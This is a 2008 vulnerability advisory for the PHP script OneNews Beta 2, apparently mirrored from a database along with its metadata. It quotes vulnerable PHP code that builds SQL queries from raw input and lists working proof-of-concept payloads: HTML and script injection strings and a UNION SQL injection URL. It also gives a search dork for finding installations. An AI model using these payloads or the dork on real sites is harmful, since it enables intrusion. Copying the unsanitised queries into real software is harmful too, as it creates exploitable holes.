OneNews Beta 2 Multiple Vulnerabilities

2008-08-24T00:00:00

Description

______________________///////////////\\\\\\\\\\\\\\\____________________ }Name : OneNews Beta 2 Multiple Vulnerabilities { {Author : suN8Hclf[crimsoN_Loyd9], (DaRk-CodeRs Group) } }Source : http://sourceforge.net/project/showfiles.php?group_id=193198 { {Dork : Powered by One-News } }Greetz : all DaRk-CodeRs guys, e.wiZz, str0ke { _________________________________{}*{}__________________________________ ========================== |1. XSS and html injection| ========================== Conditions: MAGIC_QUOTES=ON/OFF Vulnerable code(add.php): --------------------------------------CODE---------------------------------------------- $insert = "INSERT INTO entries (title, content) VALUES ('" . $_POST['title'] . "', '" . $_POST['content'] . "')"; mysql_query($insert) or die ('I cannot do that because ' . mysql_error()); --------------------------------------CODE---------------------------------------------- Vulnerable code(index.php): --------------------------------------CODE---------------------------------------------- $insert = "INSERT INTO comments (blogid, author, comment) VALUES ('" . $_POST['itemnum'] . "', '" . $_POST['author'] . "', '" . $_POST['comment'] . "')"; mysql_query($insert) or die ('I cannot do that because ' . mysql_error()); --------------------------------------CODE---------------------------------------------- NOTE: To exploit the bug in the add.php code, you have got to be logged in!!! Exploit: Put this down into the forms, while adding comments(index.php) or news(add.php): 1. <h1>HACKED</h1> 2. <html><head></head><body bgcolor=\"red\">HACKED</body></html> 3. <script>alert(\'Hacked\');</script> 4. Use your imagination :) ========================== |2. SQL Injection | ========================== Conditions: MAGIC_QUOTES=OFF Vulnerable code(index.php): --------------------------------------CODE---------------------------------------------- $query = "SELECT * FROM entries WHERE id = '" . $_GET['q'] . "' LIMIT 1"; $result = mysql_query($query); while($row = mysql_fetch_array($result)){ --------------------------------------CODE---------------------------------------------- Exploit: http://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*

{"id": "SECURITYVULNS:DOC:20396", "bulletinFamily": "software", "title": "OneNews Beta 2 Multiple Vulnerabilities", "description": "______________________///////////////\\\\\\\\\\\\\\\____________________\r\n}Name : OneNews Beta 2 Multiple Vulnerabilities {\r\n{Author : suN8Hclf[crimsoN_Loyd9], (DaRk-CodeRs Group) }\r\n}Source : http://sourceforge.net/project/showfiles.php?group_id=193198 {\r\n{Dork : Powered by One-News }\r\n}Greetz : all DaRk-CodeRs guys, e.wiZz, str0ke {\r\n_________________________________{}*{}__________________________________\r\n\r\n\r\n==========================\r\n|1. XSS and html injection|\r\n==========================\r\nConditions: MAGIC_QUOTES=ON/OFF\r\nVulnerable code(add.php):\r\n--------------------------------------CODE----------------------------------------------\r\n$insert = "INSERT INTO entries (title, content) VALUES ('" . $_POST['title'] . "', '" . $_POST['content'] . "')";\r\nmysql_query($insert) or die ('I cannot do that because ' . mysql_error());\r\n--------------------------------------CODE----------------------------------------------\r\nVulnerable code(index.php):\r\n--------------------------------------CODE----------------------------------------------\r\n$insert = "INSERT INTO comments (blogid, author, comment) VALUES ('" . $_POST['itemnum'] . "', '" . $_POST['author'] . "',\r\n'" . $_POST['comment'] . "')";\r\nmysql_query($insert) or die ('I cannot do that because ' . mysql_error());\r\n--------------------------------------CODE----------------------------------------------\r\n\r\nNOTE:\r\nTo exploit the bug in the add.php code, you have got to be logged in!!!\r\n\r\nExploit:\r\nPut this down into the forms, while adding comments(index.php) or news(add.php):\r\n\r\n1. <h1>HACKED</h1>\r\n2. <html><head></head><body bgcolor=\"red\">HACKED</body></html>\r\n3. <script>alert(\'Hacked\');</script>\r\n4. Use your imagination :)\r\n\r\n==========================\r\n|2. SQL Injection |\r\n==========================\r\nConditions: MAGIC_QUOTES=OFF\r\nVulnerable code(index.php):\r\n--------------------------------------CODE----------------------------------------------\r\n$query = "SELECT * FROM entries WHERE id = '" . $_GET['q'] . "' LIMIT 1";\r\n$result = mysql_query($query);\r\nwhile($row = mysql_fetch_array($result)){ \r\n--------------------------------------CODE----------------------------------------------\r\n\r\nExploit:\r\n\r\nhttp://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*", "published": "2008-08-24T00:00:00", "modified": "2008-08-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20396", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 65, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9240"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9240"]}]}, "exploitation": null, "vulnersScore": 0.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645379333, "score": 1659803227}, "_internal": {"score_hash": "558002ec44b39c3ff4687c724af19a2d"}}